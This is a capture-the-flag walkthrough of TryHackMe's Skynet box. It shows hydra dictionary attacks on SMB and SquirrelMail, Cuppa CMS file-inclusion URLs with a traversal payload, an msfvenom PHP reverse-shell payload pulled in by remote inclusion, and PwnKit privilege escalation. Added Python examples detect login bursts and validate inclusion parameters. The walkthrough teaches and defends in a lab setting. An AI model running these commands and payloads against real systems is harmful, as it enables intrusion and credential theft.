oRdInaRy.log

Skynet THM CTF Walkthrough


Welcome to my little walkthrough for THM's Skynet challenge :D

I have no idea what this will be, so without too much talking, let's get started!

Initial enumeration

First, some blind enumeration just to get an idea of what to do next!

Let's start with the classic nmap scan. I didn't include the whole output because what really matters is what's open.

Open ports

  1. 445 - SMB - Should try to enumerate as anonymous

  2. 80 - HTTP - Biggest point of interest; check it out manually, most of the action will probably happen here over time

  3. 139 - SMB - Same as the first one

  4. 143 - IMAP - Maybe attempt to connect and check for interesting stuff in emails???

  5. 110 - POP3 - Same as the last one

  6. 22 - SSH - Useful if I get creds

Decent attack surface, four things it seems: HTTP, IMAP, POP3, SMB.

Discarding some, like SSH, which will only be useful if we get creds.

Website functionality

Just a search input and a button; the request always looks like:

POST / HTTP/1.1
Host: 10.X.X.X
Content-Length: 20
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.X.X.X
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.X.X.X/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

submit=Skynet+Search

Changing the submit value seems to have no effect; the site is confirmed to be built with PHP.

These CTFs rarely put what's needed at /, so in the meantime I ran dirsearch to find any directories; I'd recommend you start running it now.

SMB Shares

There are two shares, anonymous and milesdyson. Only anonymous is readable; it has an attention.txt saying:

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

There are also some log files inside logs/, and the only one with actual content contains:

cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

These are either users or maybe passwords (even better).

Now I think we know enough and can actually read what the questions are and see how to use our knowledge.

1st Question

Attempts against SMB

This one asks for Miles' email password (very likely tied to the POP3 and IMAP ports, which seem to be there because a SquirrelMail instance is hosted at /squirrelmail, found with dirsearch).

So... now we have a bunch of vectors. The first one I tried was accessing the milesdyson share, with the user very likely being the same name and the password one of the ones in the log file.

With hydra we can do a dictionary attack:

hydra -l milesdyson -P 10.X.X.X-anonymous_logs_log1.txt smb://10.X.X.X

Though this one didn't exactly work... What I noticed is that milesdyson IS the right username, as other options give an anonymous success.

My next idea was to maybe use the same log to attempt usernames:

hydra -L 10.X.X.X-anonymous_logs_log1.txt -P 10.X.X.X-anonymous_logs_log1.txt smb://10.X.X.X

But all of them returned that the account didn't exist... Just in case, I downloaded the other logs, but as mentioned before they are empty.

Now, what about going directly against SquirrelMail?

Attempts against SquirrelMail

The login page already reveals the version: 1.4.23.

A direct search for that version on ExploitDB doesn't show much; however, deeper searches reveal it's quite old and has all sorts of vulns: LFI, XSS, HTML injection, etc. But most of these need some sort of foothold, so first let's just brute-force milesdyson with our log file, this time against SquirrelMail.

The command would be:

hydra -V -l milesdyson -P 10.X.X.X-anonymous_logs_log1.txt 10.X.X.X http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect"

Wait 3 seconds, and we get:

[80][http-post-form] host: 10.X.X.X   login: milesdyson   password: [go do it yourself!]

With this we can answer the question and do a successful login at /squirrelmail.
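From the server side, a hydra run like the one above is a burst of POSTs to the same login handler from one client. As an added example (not from the original post, and not part of the CTF), the following Python scans constructed Apache access-log lines for exactly that pattern; the IPs, timestamps and the 5-in-10-seconds threshold are assumptions chosen for the sample, and a real deployment would correlate this with SquirrelMail's own authentication log rather than the access log alone.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed Apache combined-log lines (sample data, not from the target box).
# 10.0.0.5 sends six POSTs to the SquirrelMail login handler in six seconds,
# which is what an http-post-form dictionary attack looks like from the server
# side; 10.0.0.9 logs in once like a normal user.
SAMPLE_LOG = """\
10.0.0.9 - - [17/Sep/2019:03:00:01 +0000] "GET /squirrelmail/src/login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Sep/2019:03:00:02 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Sep/2019:03:00:03 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Sep/2019:03:00:04 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Sep/2019:03:00:05 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Sep/2019:03:00:06 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Sep/2019:03:00:07 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Sep/2019:03:00:20 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Sep/2019:03:00:21 +0000] "GET /squirrelmail/src/webmail.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status code of the combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, method, path-without-query) or None for junk lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]
    return m.group("ip"), ts, m.group("method"), path


def detect_login_bursts(log_text, endpoint="/squirrelmail/src/redirect.php",
                        threshold=5, window_seconds=10):
    """Sliding-window count of POSTs to the login endpoint per client IP.

    Returns {ip: largest number of login POSTs seen inside one window} for every
    IP that reached `threshold`. Lines are expected in chronological order, as
    Apache writes them.
    """
    recent = defaultdict(deque)   # ip -> timestamps of POSTs still inside the window
    alerts = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path = parsed
        if method != "POST" or path != endpoint:
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            alerts[ip] = max(alerts.get(ip, 0), len(q))
    return alerts


if __name__ == "__main__":
    for ip, hits in detect_login_bursts(SAMPLE_LOG).items():
        print(f"possible password guessing against SquirrelMail from {ip}: "
              f"{hits} login POSTs within 10s")
```

The threshold is deliberately low for the sample; on a real mail server you would tune it against normal traffic and have the alert feed a lockout or rate limit on the login endpoint.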

2nd Question

Now this one wants a directory! Spoiler alert: neither dirsearch nor gobuster is going to help!

Before anything, remember the credentials for SquirrelMail? Well, go there and there are some emails, one of which has "Samba Password reset" as the subject; open it and it says the SMB password has been reset to:

)s{A&2Z=[truncated! once again, go do it yourself!]

There are two other emails, containing binary data and random text respectively.

But let's go step by step. First, let's access the SMB share "milesdyson" with our password and a user of the same name as the share.

	milesdyson                                        	READ ONLY	Miles Dyson Personal Share
	./milesdyson
	dr--r--r--                0 Tue Sep 17 03:05:47 2019	.
	dr--r--r--                0 Tue Sep 17 21:51:02 2019	..
	fr--r--r--          5743095 Tue Sep 17 03:05:14 2019	Improving Deep Neural Networks.pdf
	fr--r--r--         12927230 Tue Sep 17 03:05:14 2019	Natural Language Processing-Building Sequence Models.pdf
	fr--r--r--         19655446 Tue Sep 17 03:05:14 2019	Convolutional Neural Networks-CNN.pdf
	dr--r--r--                0 Tue Sep 17 03:18:40 2019	notes
	fr--r--r--          4304586 Tue Sep 17 03:05:14 2019	Neural Networks and Deep Learning.pdf
	fr--r--r--          3531427 Tue Sep 17 03:05:14 2019	Structuring your Machine Learning Project.pdf

There are mostly just random PDFs, though the notes/ directory looks interesting.

	milesdyson                                        	READ ONLY	Miles Dyson Personal Share
	./milesdysonnotes
	dr--r--r--                0 Tue Sep 17 03:18:40 2019	.
	dr--r--r--                0 Tue Sep 17 03:05:47 2019	..
	fr--r--r--            65601 Tue Sep 17 03:01:29 2019	3.01 Search.md
	fr--r--r--             5683 Tue Sep 17 03:01:29 2019	4.01 Agent-Based Models.md
	fr--r--r--             7949 Tue Sep 17 03:01:29 2019	2.08 In Practice.md
	fr--r--r--             3114 Tue Sep 17 03:01:29 2019	0.00 Cover.md
	fr--r--r--            70314 Tue Sep 17 03:01:29 2019	1.02 Linear Algebra.md
	fr--r--r--              117 Tue Sep 17 03:18:39 2019	important.txt
	fr--r--r--             9221 Tue Sep 17 03:01:29 2019	6.01 pandas.md
	fr--r--r--               33 Tue Sep 17 03:01:29 2019	3.00 Artificial Intelligence.md
	fr--r--r--             1165 Tue Sep 17 03:01:29 2019	2.01 Overview.md
	fr--r--r--            71657 Tue Sep 17 03:01:29 2019	3.02 Planning.md
	fr--r--r--            62712 Tue Sep 17 03:01:29 2019	1.04 Probability.md
	fr--r--r--            82633 Tue Sep 17 03:01:29 2019	2.06 Natural Language Processing.md
	fr--r--r--               26 Tue Sep 17 03:01:29 2019	2.00 Machine Learning.md
	fr--r--r--            40779 Tue Sep 17 03:01:29 2019	1.03 Calculus.md
	fr--r--r--            25119 Tue Sep 17 03:01:29 2019	3.03 Reinforcement Learning.md
	fr--r--r--            81655 Tue Sep 17 03:01:29 2019	1.08 Probabilistic Graphical Models.md
	fr--r--r--            39554 Tue Sep 17 03:01:29 2019	1.06 Bayesian Statistics.md
	fr--r--r--               20 Tue Sep 17 03:01:29 2019	6.00 Appendices.md
	fr--r--r--             7627 Tue Sep 17 03:01:29 2019	1.01 Functions.md
	fr--r--r--           144726 Tue Sep 17 03:01:29 2019	2.03 Neural Nets.md
	fr--r--r--            33383 Tue Sep 17 03:01:29 2019	2.04 Model Selection.md
	fr--r--r--            94287 Tue Sep 17 03:01:29 2019	2.02 Supervised Learning.md
	fr--r--r--               20 Tue Sep 17 03:01:29 2019	4.00 Simulation.md
	fr--r--r--             1123 Tue Sep 17 03:01:29 2019	3.05 In Practice.md
	fr--r--r--             5110 Tue Sep 17 03:01:29 2019	1.07 Graphs.md
	fr--r--r--            21579 Tue Sep 17 03:01:29 2019	2.07 Unsupervised Learning.md
	fr--r--r--            39443 Tue Sep 17 03:01:29 2019	2.05 Bayesian Learning.md
	fr--r--r--             2516 Tue Sep 17 03:01:29 2019	5.03 Anonymization.md
	fr--r--r--             5788 Tue Sep 17 03:01:29 2019	5.01 Process.md
	fr--r--r--            25823 Tue Sep 17 03:01:29 2019	1.09 Optimization.md
	fr--r--r--            64291 Tue Sep 17 03:01:29 2019	1.05 Statistics.md
	fr--r--r--              940 Tue Sep 17 03:01:29 2019	5.02 Visualization.md
	fr--r--r--               21 Tue Sep 17 03:01:29 2019	5.00 In Practice.md
	fr--r--r--            44601 Tue Sep 17 03:01:29 2019	4.02 Nonlinear Dynamics.md
	fr--r--r--            28790 Tue Sep 17 03:01:29 2019	1.10 Algorithms.md
	fr--r--r--            13360 Tue Sep 17 03:01:29 2019	3.04 Filtering.md
	fr--r--r--               22 Tue Sep 17 03:01:29 2019	1.00 Foundations.md

Once again a file stands out, in this case important.txt. To download it we can use the following command:

smbmap -H 10.X.X.X -u "milesdyson" -p ')s{A&2Z=[truncated]' --download 'milesdyson/notes/important.txt'

Then, we see its contents:

1. Add features to beta CMS /45kra[truncated]
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

With that we have found the hidden directory, and the note mentions a "beta CMS" is hosted there.

3rd Question

This is probably just a spoiler on the vuln we'll exploit: remote file inclusion.

4th Question

Ok, so let's see... the hidden directory just has a simple page that seems to have no logic on it. Going back to SquirrelMail, my first idea was to check out the strange emails from before: the binary data can't be converted by CyberChef, and the random text seems to have no meaning, so I marked them as red herrings.

After a bunch of research I found nothing on SquirrelMail, so I decided to pivot to the "beta CMS" mentioned before. I threw dirsearch at it and managed to find an /administrator/ directory returning 200 status codes.

Inside we have a new attack surface, as this CMS is Cuppa CMS; right now we just have the login form.

I originally tried a bunch of creds but got nothing, so after quite a long time attempting brute force I went searching for remote file inclusion vulns to see if they didn't depend on being authenticated.

The only exploit against CuppaCMS in ExploitDB offered just what we needed: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion - PHP webapps Exploit

This looks promising, so I tried it out. First of all, the equivalent of /cuppa for our target would actually be /45kra24zxs28v3yd/administrator/, so the path becomes /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php. Finally we attempt some payloads (?urlConfig=../../../../../../../../../etc/passwd); the whole thing would look like: /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd.

So I go to the browser's URL tab, put that in and...

Screenshot of successful LFI

YES! We have LFI, and potentially RFI too! So I immediately prepared a payload; in my case I preferred using msfvenom to make a meterpreter payload so I'd start off immediately with a decent shell:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.X.X.X LPORT=4444 -f raw > shell.txt

Then do the usual setup in msfconsole to receive the shell, and finally, serving the file with a Python HTTP server, you can trigger the payload:

http://10.X.X.X/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.X.X.X:8080/shell.txt
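Both requests above work because the urlConfig value reaches a file-inclusion call without being constrained: a relative path walks out of the web root, and a URL pulls in remote code. As an added example (not from the original post and not Cuppa CMS code), the Python below shows the input handling that would have stopped both: decode once, accept only a bare allowlisted filename, refuse any URL scheme, and still verify that the resolved path stays under the intended directory. The base directory, the allowlist names and the sample inputs are constructed assumptions.

```python
import os
import re
from urllib.parse import unquote

# Hypothetical directory standing in for the CMS's alerts/ folder (assumption).
ALERTS_DIR = "/var/www/html/cms/administrator/alerts"
# Allowlist of config fragments the page may include (constructed names).
ALLOWED_CONFIGS = {"default", "compact"}

# Anything that starts like "scheme:" (http:, https:, ftp:, stream wrappers, ...)
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")


def check_config_param(requested, base_dir=ALERTS_DIR, allowed=ALLOWED_CONFIGS):
    """Validate a user-supplied config-file parameter before it reaches include().

    Returns (absolute_path, "ok") when the value is safe to include, otherwise
    (None, reason) with a short reason suitable for an application log line.
    """
    value = unquote(requested)               # the server decodes once; mirror that
    if "\x00" in value:
        return None, "null byte"
    if SCHEME_RE.match(value):
        return None, "url scheme (remote inclusion / stream wrapper)"
    if value != os.path.basename(value):     # any '/' means a directory component
        return None, "directory component or traversal"
    name, ext = os.path.splitext(value)
    if ext != ".php" or name not in allowed:
        return None, "not an allowlisted config"
    # Defence in depth: even an allowlisted name must resolve inside base_dir
    # (guards against a future allowlist entry that sneaks in a symlink).
    real_base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(real_base, value))
    if os.path.commonpath([real_base, candidate]) != real_base:
        return None, "resolved outside base directory"
    return candidate, "ok"


# Constructed inputs: one legitimate value, the two payload shapes used in the
# walkthrough (traversal, remote URL), an encoded traversal, a null-byte trick
# and a file that exists but is not allowlisted.
SAMPLE_INPUTS = [
    "default.php",
    "../../../../../../../../../etc/passwd",
    "..%2F..%2Fetc%2Fpasswd",
    "http://10.X.X.X:8080/shell.txt",
    "default.php%00.jpg",
    "other.php",
]

if __name__ == "__main__":
    for raw in SAMPLE_INPUTS:
        path, reason = check_config_param(raw)
        verdict = f"include {path}" if path else f"reject ({reason})"
        print(f"{raw!r:45} -> {verdict}")
```

The allowlist does the real work; the realpath check is there so the function stays safe if someone later relaxes the name rule. Logging the reason string gives the same telemetry an access-log rule for `urlConfig=../` or `urlConfig=http` would, but at the point where the decision is made.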

Finally, we can do some stuff, such as grabbing the login credentials from the configuration file:

<?php 
	class Configuration{
		public $host = "localhost";
		public $db = "cuppa";
		public $user = "root";
		public $password = "password123";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "";
		public $secure_login_redirect = "";
	} 
?>

Though now we know they weren't needed, as we can just keep traversing the filesystem until we find the user.txt file in /home/milesdyson:

7ce[truncated]

5th Question

Finally, we are on the last step! It seems we are going to need some privilege escalation. I decided to start a normal shell and do some initial recon: the classics, such as whoami and looking for SUID binaries, maybe pkexec?

I quickly got lots of ideas on possibilities, but to not lose time on rabbit holes I decided to take a look at the hint, which said: "A recursive call"...

Pretty sure this references one of two things. Maybe PwnKit, because the classic PwnKit vuln involves pkexec calling itself recursively, exploiting how it parses arguments and environment variables.

Or... it could also be cron jobs.

Either way, the one that would be easiest to exploit, and that seems like it should work judging by the output of pkexec --version, is PwnKit.

In case they were needed, even gcc and make are installed, though a precompiled binary should be more than enough. So through meterpreter I uploaded the binary to /tmp/exploit. Afterwards, just chmod it, run it, and see how whoami now says root.

FINALLY! Just go and cat /root/root.txt:

3f0[truncated]

Conclusion

Overall this was a really fun CTF; it used quite a bunch of vulns. I also checked out the official walkthrough to compare. Apparently "A recursive call" referred to exploiting a bunch of cron jobs with weak permissions, but PwnKit did the same but better anyway and was what seemed the easiest to exploit.

Another nice thing is that it covered quite a bunch of areas: SMB enumeration, dictionary attacks with hydra, directory enumeration, and a bunch of searches on ExploitDB.

Hopefully, unlike others, this walkthrough doesn't just show you the process to solve this CTF, but also the thinking behind it.

Remember you can drop me a DM on Discord for suggestions! See you next time! :D

#ctf #rfi #smb #walkthrough